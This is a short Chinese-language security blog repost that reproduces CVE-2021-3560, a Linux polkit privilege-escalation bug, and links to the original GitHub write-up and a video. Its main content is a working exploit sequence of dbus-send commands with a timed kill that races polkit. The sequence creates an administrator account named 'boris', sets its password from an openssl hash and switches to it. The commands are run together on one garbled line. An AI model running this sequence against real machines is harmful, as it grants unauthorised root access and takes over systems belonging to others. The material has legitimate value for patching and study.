CVE-2021-3560 Linux polkit 提权
2021-06-17 11:25:40 Author: mp.weixin.qq.com(查看原文) 阅读量:133 收藏


文章来源:安全鸭

看到大佬的操作,连复现都没复现明白,还差点意思。

time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1#创建用户dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1 & sleep 0.008s ; kill $!#查看用户id boris#openssl生成密码hash值openssl passwd -5 iaminvincible!#为用户设置密码。注意string:''处填入上面openssl生成的hash值dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1001 org.freedesktop.Accounts.User.SetPassword string:'' string:GoldenEye & sleep 0.008s ; kill $!#切换用户su - boris

原文复现及分析:

https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

扒拉下来的视频:

原视频链接:

https://youtu.be/QZhz64yEd0g

推荐文章++++

*Mssql 常规提权

*Windows系统提权之数据库提权

*Windows系统提权之数据库提权


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650514695&idx=3&sn=b952dd1f1aa234386c6b5d93d024938c&chksm=83bac0e3b4cd49f52b725448d1f6d00a2e111b75fe92265d4ebf7457a0ec89ea8ac35f50fcf7#rd
如有侵权请联系:admin#unsafe.sh